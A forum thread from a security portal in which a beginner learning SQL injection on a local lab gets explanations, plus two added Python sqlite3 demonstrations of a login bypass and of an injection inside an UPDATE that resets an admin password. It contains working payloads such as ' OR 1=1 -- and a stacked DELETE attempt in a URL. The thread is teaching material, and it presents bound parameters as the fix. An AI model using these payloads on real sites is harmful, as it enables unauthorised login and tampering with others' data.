IT Security and Insecurity Portal

Basic SQL Injection

Posted: Wed Feb 25, 2009 11:08 pm
Cool_Man (Beginner; Joined: Feb 26, 2009; Posts: 3)

Hi

I'm trying to learn SQL injection (spent 4-5 hours). I have set up a basic PHP+APACHE+MYSQL development area, with a user table and a basic front end using PHP.

I'm trying to do the basic SQL injection, where I'm inserting

inside one of the inputs. The result I'm getting is

Code:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\xampp\login.php on line 20 --- Incorrect Username or Password ---

However, I don't quite get how this is an exploit... (I know it sounds stupid)

Posted: Wed Feb 25, 2009 11:16 pm
slsl (Advanced user; Joined: Oct 14, 2008; Posts: 66)

Try different things. What it is saying with that error is that your syntax is wrong. Try:

Code:
' OR 1=1--+
" OR 1=1--+

It has to do with how your statement in the code is set up. If your code was

Code:
// $pass goes straight into the SQL string, unescaped (the ORDER BY column name is assumed; the post wrote "ORDER BY DESC")
$query = "SELECT * FROM USERS WHERE password = '" . $pass . "' ORDER BY id DESC";

you would use something like ' OR 1=1 --+

SQL injection is a common security flaw in sites where they don't sanitize user input that goes into SQL queries. This allows users to manipulate the database and the returned input in many ways; that is why I would call it an exploit.

I recommend you visit a tutorial like http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Posted: Thu Feb 26, 2009 12:10 am
Cool_Man (Beginner; Joined: Feb 26, 2009; Posts: 3)

Now I've got three scenarios:

If I use the above for both input boxes, I log in as normal.
If I use it on only one input box, I don't log in, but I get the error message.
If I use a normal invalid username and password, I don't log in, and get no error message.

Posted: Thu Feb 26, 2009 1:06 am
slsl (Advanced user; Joined: Oct 14, 2008; Posts: 66)

That would be because of how the SQL query is formed.
Say the query is

Code:
// both inputs are concatenated into the SQL string with no escaping
$query = "SELECT * FROM users WHERE username = '" . $user . "' AND password = '" . $pass . "'";

When you use ' OR 1=1 --+ you are saying: grab the user from the users table where username is NULL, or if 1=1 grab a user. Since 1=1 is always true, it will grab all users in the database. If you use invalid info it is saying: grab the user with that username AND that password, but since it does not exist it returns NULL. Also you should know that -- is the comment symbol in SQL, so it disregards anything after the "--".

If you don't really know how SQL works and how to form statements, use http://www.w3schools.com/sql/ . I would recommend that site for almost any web programming language.
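
The login bypass slsl explains in this reply and the earlier one, as an added example that is not part of the original thread: a Python script that uses the standard library's sqlite3 module as a stand-in for PHP's mysql_query(), builds the same concatenated SELECT, and runs it with valid credentials, invalid credentials, the ' OR 1=1 -- payload in one and in both fields, and a payload with no trailing comment. The users table, its rows and the function names are constructed for the example. Two caveats a practitioner would want: MySQL only treats -- as a comment when whitespace follows it, which is why the payload is written --+ in a URL (the + decodes to a space), so the example uses "-- " with a trailing space, which both SQLite and MySQL accept; and the syntax-error branch is the analogue of mysql_query() returning false, which is what makes mysql_num_rows() emit the warning quoted in the first post.

```python
import sqlite3

# Constructed sample data for this example (not from the thread).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory stand-in for the thread's MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, user, pw):
    """The concatenated query from the thread, as the PHP login page builds it.

    Returns ("ok", rows) when the query parsed and ran, or ("error", message)
    when the injected input broke the SQL syntax. The error branch is the
    analogue of mysql_query() returning false, after which mysql_num_rows()
    emits the warning quoted in the first post.
    """
    sql = ("SELECT * FROM users WHERE username = '" + user +
           "' AND password = '" + pw + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return "error", str(e)
    return "ok", rows


def safe_login(conn, user, pw):
    """Same lookup with bound parameters: the input is data, never SQL."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (user, pw)).fetchall()


def demo():
    conn = make_db()
    payload = "' OR 1=1 -- "   # trailing space: MySQL needs whitespace after --
    broken = "' OR 1=1"        # no comment, so the page's closing quote dangles
    return {
        "valid": vulnerable_login(conn, "alice", "s3cret"),    # one row
        "invalid": vulnerable_login(conn, "alice", "wrong"),   # no rows, no error
        "inject_user": vulnerable_login(conn, payload, "x"),   # every row: logged in
        "inject_both": vulnerable_login(conn, payload, payload),
        "broken": vulnerable_login(conn, broken, "x"),         # syntax error
        "safe": safe_login(conn, payload, "x"),                # no rows
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

With the payload in the username field the WHERE clause collapses to username = '' OR 1=1 and the -- swallows the rest of the page's query, password check included; with the payload lacking the comment, the leftover ' AND password = 'x' is a syntax error, which is the "not a valid MySQL result resource" situation rather than a login.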

Posted: Fri Feb 27, 2009 11:39 pm
Cool_Man (Beginner; Joined: Feb 26, 2009; Posts: 3)

Thanks for the help.
I have done a few experiments on UNION ALL SELECT and blind injection (brute...).

Don't want to sound stupid, but is it possible to INSERT and DELETE data from the URL? Because I have not managed to do it.

What I have tried:

Code:
www.example.com/users.php?id=2'; DELETE FROM users WHERE 1 or username = '";

Thanks

Posted: Sat Feb 28, 2009 2:27 am
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)

In the case of MySQL/PHP you can't use stacked SQL queries (separated by ;). So you can manipulate with UPDATE only if there is SQL injection in an UPDATE query, and the same for INSERT and DELETE.
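
What waraxe describes, as an added example that is not part of the original thread: a Python script using the standard library's sqlite3 module, whose execute() also runs exactly one statement per call, as a stand-in for PHP's mysql_query(). The "change my e-mail" handler, its users table and the function names are constructed for the example. It first tries the stacked '; DELETE approach from the previous post, which is refused as a whole, then shows the kind of injection that does work against an UPDATE: one that stays inside the single statement, extending the SET list and rewriting the WHERE clause so that one user's request changes another user's password.

```python
import sqlite3

# Constructed sample data for this example (not from the thread).
ROWS = [("admin", "adminpw", "admin@example.com"),
        ("bob", "hunter2", "bob@example.com")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, password, email) VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_update_email(conn, user_id, new_email):
    """Hypothetical 'change my e-mail' handler that concatenates the new value
    into an UPDATE, the way the thread's login page concatenates $pass.

    sqlite3's execute() runs one statement and refuses input that carries a
    second statement after ';'. That is used here as the analogue of
    mysql_query(), which waraxe says cannot run stacked queries either.
    """
    sql = "UPDATE users SET email = '" + new_email + "' WHERE id = " + str(int(user_id))
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except (sqlite3.ProgrammingError, sqlite3.Warning) as e:   # stacked statement
        return "rejected: " + str(e)
    except sqlite3.OperationalError as e:                      # malformed SQL
        return "error: " + str(e)


def lookup(conn, username):
    return conn.execute("SELECT password, email FROM users WHERE username = ?",
                        (username,)).fetchone()


def count_users(conn):
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def demo():
    conn = make_db()
    out = {}
    # 1. Stacked query, like the DELETE attempt in the previous post: the call
    #    is rejected before anything runs, so the table is untouched.
    out["stacked"] = vulnerable_update_email(conn, 2, "x'; DELETE FROM users; -- ")
    out["users_after_stacked"] = count_users(conn)
    # 2. Injection that stays inside the one UPDATE: extend the SET list and
    #    replace the WHERE clause, so bob's request (id 2) changes admin's password.
    out["in_update"] = vulnerable_update_email(
        conn, 2, "x', password = 'owned' WHERE username = 'admin' -- ")
    out["admin"] = lookup(conn, "admin")
    out["bob"] = lookup(conn, "bob")
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The second payload turns the handler's statement into UPDATE users SET email = 'x', password = 'owned' WHERE username = 'admin' with the original WHERE id = 2 commented out: no second statement is needed, which is the point waraxe makes. Bound parameters, as in the lookup() helper, remove both cases.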

www.waraxe.us Forum Index -> Sql injection
All times are GMT